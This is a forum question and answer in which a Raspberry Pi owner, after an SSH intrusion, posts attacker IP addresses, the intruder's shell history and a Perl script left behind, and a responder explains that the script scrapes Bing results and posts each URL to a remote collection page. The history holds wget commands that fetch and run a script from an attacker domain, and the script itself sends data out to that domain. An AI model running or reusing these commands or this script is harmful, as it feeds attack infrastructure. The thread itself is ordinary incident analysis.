Skip to content

After securing my webserver (rpi) from foreign ssh logins, I found this perl script on my computer. Can someone tell me what it does? [closed]

Clay

There was an account named “user” that would be used for these logins, which would be from all over the world. I spent several hours yesterday securing the computer and there have been no logins since that time. I awked the /var/log/auth.log into a list of ips ordered from oldest to most recent login, if that somehow helps:

    185.145.252.26
    185.145.252.36
    109.236.83.3
    104.167.2.4
    217.23.13.125
    185.38.148.238
    194.88.106.146
    43.225.107.70
    194.88.107.163
    192.162.101.217
    62.112.11.88
    194.63.141.141
    194.88.107.162
    74.222.19.247
    194.88.107.164
    178.137.184.237
    167.114.210.108
    5.196.76.41
    118.70.72.25
    109.236.91.85
    62.112.11.222
    91.195.103.172
    62.112.11.94
    62.112.11.90
    188.27.75.73
    194.88.106.197
    194.88.107.165
    38.84.132.236
    91.197.235.11
    62.112.11.79
    62.112.11.223
    144.76.112.21
    185.8.7.144
    91.230.47.91
    91.230.47.92
    91.195.103.189
    91.230.47.89
    91.230.47.90
    109.236.89.72
    195.228.11.82
    109.236.92.184
    46.175.121.38
    94.177.190.188
    171.251.76.179
    173.212.230.79
    144.217.75.30
    5.141.202.235
    31.207.47.36
    62.112.11.86
    217.23.2.183
    217.23.1.87
    154.122.98.44
    41.47.42.128
    41.242.137.33
    171.232.175.131
    41.114.123.190
    1.54.115.72
    108.170.8.185
    86.121.85.122
    91.197.232.103
    160.0.224.69
    217.23.2.77
    212.83.171.102
    41.145.17.243
    62.112.11.81
    82.79.252.36
    41.114.63.134
    5.56.133.126
    109.120.131.106
    76.68.108.151
    113.20.108.27
    46.246.61.20
    146.185.28.52
    45.32.219.199

One of the first things I did after changing the password of the “user” account was running history, which gave me this result:

1  sudo
2  sudo
3  sudo service vsftpd stop
4  su clay
5  unset PROMPT_COMMAND
6  PS1='[PEXPECT]$'
7  wget http://xpl.silverlords.org/bing -O bing
8  wget http://www.silverlords.org/wordlist/xaaaaaaaaqb.txt -O word ; perl bing word
9  wget http://www.silverlords.org/wordlist/xaaaaaaaaiv.txt -O word ; perl bing word
10  uname
11  n
12  uname
13  history

I then ran cat /home/user/.bash_history for more but what I already had was all that was in the file.

In “user”‘s home folder, I found four files, bing, output.13.19.27.txt , output.16.10.38.txt, and word. All were empty except bing, which was a perl script:

#!/usr/bin/perl                                                            
use strict;                                                          
use LWP::UserAgent;                                                                 
use LWP::Simple;                                                                    
use POSIX qw(strftime);                                                             
my $data = strftime "%H.%M.%S", gmtime;                                             

my $ARGC = @ARGV;                                                                   
if ($ARGC !=1) {                                                                    
        printf "$0 arquivo.txtn";                                                  
        printf "Coded by: Al3xG0 x@~n";                                            
        exit(1);                                                                    
}
my $st = rand();
my $filename = $ARGV[0];
print "Input Filename - $filenamen";

my $max_results = 2;

open (IFH, "< $filename") or die $!;
open (OFH, "> output.${data}.txt") or die $!;

while (<IFH>) {
        next if /^ *$/;
        my $search_word = $_;
        $search_word =~ s/n//;
        print "Results for -$search_word-n";
        for (my $i = 0; $i < $max_results; $i += 10) {
                my $b = LWP::UserAgent->new(agent => 'Mozilla/4.8 [en] (Windows NT 6.0; U)');
                $b->timeout(30); $b->env_proxy;
                my $c = $b->get('http://www.bing.com/search?q=' . $search_word . '&first=' . $i . '&FORM=PERE')->content;
                my $check = index($c, 'sb_pagN');
                if ($check == -1) { last; }
                while (1) { 
                        my $n = index($c, '<h2><a href="');
                        if ($n == -1) { last; }
                        $c = substr($c, $n + 13);
                        my $s = substr($c, 0, index($c, '"'));
                        my $save = undef;
                        if ($s =~ /http://([^/]+)//g) { $save = $s; }
                        print "$saven";
                        #if ($save !~ /^ *$/) { print OFH "$saven"; print "$saven"};
                        getprint("http://post.silverlords.org/sites.php?site=$save");
                }
        }
        print "n";
}
close (IFH);
close (OFH);

I don’t know perl, and after spending so much time with sshd config, blacklists, etc., I don’t really have the time or energy to learn. If anyone could tell me what the script does and/or what the attackers were trying to do that would be great.

Thanks so much,
Clay

EDIT: I found this article that could explain the purpose of the bing search script: https://www.wired.com/2013/02/microsoft-bing-fights-botnets/

Advertisement

Answer

It reads the file passed on the command line, and uses each line as a phrase to do a Bing search. It prints the URL of every search result returned by Bing, and also sends it to http://post.silverlords.org/sites.php?site=$save where $saveis the URL

It used to write the same URLs to the output.HH.MM.SS.txt files, but that line has been commented out so the files are created but left empty

So it’s just a command-line bing search; nothing too sinister. Essentially nothing that they couldn’t run on any machine that has access to bing

Borodin
User contributions licensed under: CC BY-SA
1 People found this is helpful